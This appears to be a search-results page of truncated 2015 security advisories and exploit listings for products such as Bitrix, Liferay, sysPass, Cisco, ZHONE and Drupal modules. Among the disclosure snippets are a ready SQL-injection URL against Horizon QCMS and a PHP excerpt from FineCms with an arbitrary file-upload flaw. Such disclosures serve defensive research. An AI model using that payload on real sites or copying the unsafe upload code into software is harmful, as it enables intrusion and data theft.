3632 matches found
bitrix.mpbuilder Bitrix 1.0.10 Local File Inclusion
Advisory ID: HTB23281 Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Versions: 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 without technical details Vendor Notification: November 18, 2015 Vendor Patch: November 25, 2015...
Potential Command Injection
Overview When the ffprobe functionality is enabled on the server, HTTP POST requests can be made to /probe. These requests are passed to the ffprobe binary on the server. Through this HTTP endpoint it is possible to send a malformed source file name to ffprobe that results in arbitrary command...
methodOverride Middleware Reflected Cross-Site Scripting
Overview Connect is a stack of middleware that is executed in order in each request. The "methodOverride" middleware allows the http post to override the method of the request with the value of the "method" post key or with the header "x-http-method-override". Because the user post input was not...
ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities
Exploit for hardware platform in category dos / poc Vantage Point Security Advisory 2015-003 ======================================== Title: Multiple Remote Code Execution found in ZHONE Vendor: Zhone Vendor URL: http://www.zhone.com Device Model: ZHONE ZNID GPON 2426A 24xx, 24xxA, 42xx, 42xxA,...
Horizon QCMS 4.0 'category' 参数SQL注入漏洞
受影响系统 Horizon QCMS Horizon QCMS 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序方法可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! http://host/download.php?category=%27%20union%20select%201,2,version,4,5,6%20--%202 建议:...
Liferay 6.1.0 CE - Privilege Escalation
Liferay 6.1.0 CE - Privilege Escalation Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation Date: 18/05/2015 Exploit Author: Massimo De Luca - mentat.is Vendor Homepage: https://www.liferay.com Software Link:...
Liferay 6.1.0 CE - Privilege Escalation
Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation Date: 18/05/2015 Exploit Author: Massimo De Luca - mentat.is Vendor Homepage: https://www.liferay.com Software Link: http://www.liferay.com/it/community/releases/-/assetpublisher/nSr2/content/id/18060360 Version: 6.1.0 CE Tested on: -...
X_CART Installation Script Cross Site Scripting Vulnerability
XCART is prone to a cross-site scripting XSS vulnerability. SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:qualiteam:x-cart";...
nevisAuth Authentication Bypass Vulnerability
nevisAuth versions since 4.13.0.0 2012-11-21 and prior to 4.18.3.1 2015-07-02 suffer from an authentication bypass vulnerability. Product: nevisAuth 1 Vendor: AdNovum 2 CVD ID: CVE-2015-5372 Subject: Authentication Bypass Risk: Critical Effect: Remotely exploitable Authors: Antoine Neuenschwander...
CVE-2015-7304
Cross-site scripting XSS vulnerability in the amoCRM module 7.x-1.x before 7.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified HTTP POST data...
Cross site scripting
Cross-site scripting XSS vulnerability in the amoCRM module 7.x-1.x before 7.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified HTTP POST data...
Cisco Unity Connection Web Interface SQL Injection Vulnerability
A vulnerability in the web interface of Cisco Unity Connection UC could allow an authenticated, remote attacker to impact the confidentiality of the system by executing arbitrary SQL queries. The vulnerability is due to a lack of input validation on user-supplied input in SQL queries. An attacker...
FineCms 免费版任意文件上传漏洞
路径:dayrui/libraries/Chart/ofcuploadimage.php $defaultpath = '../tmp-upload-images/'; if !fileexists$defaultpath mkdir$defaultpath, 0777, true; $destination = $defaultpath . basename $GET 'name' ; echo 'Saving your image to: '. $destination; $jfh = fopen$destination, 'w' or die"can't open file";...
Amazon Linux: Security Advisory (ALAS-2015-536)
The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
[SYSS-2015-030] Improper Handling of Insufficient Privileges (CWE-274) in Page2Flip Premium App 2.5
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-030 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Improper Handling of...
Cisco FireSIGHT Management Center System Policy Deletion Vulnerability
A vulnerability in the web interface function to delete a system policy configured in the Cisco FireSIGHT Management Center application could allow unauthenticated, remote attackers to delete a system policy other than their own. The vulnerability is due to improper input validation of certain...
[SYSS-2015-031] sysPass - SQL Injection
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-031 Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solutio...
sysPass 1.0.9 - SQL Injection
sysPass 1.0.9 - SQL Injection -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-031 Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor...
sysPass 1.0.9 - SQL Injection Vulnerability
Exploit for php platform in category web applications Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solution Date: 2014-08-04...
sysPass 1.0.9 - SQL Injection
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-031 Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solutio...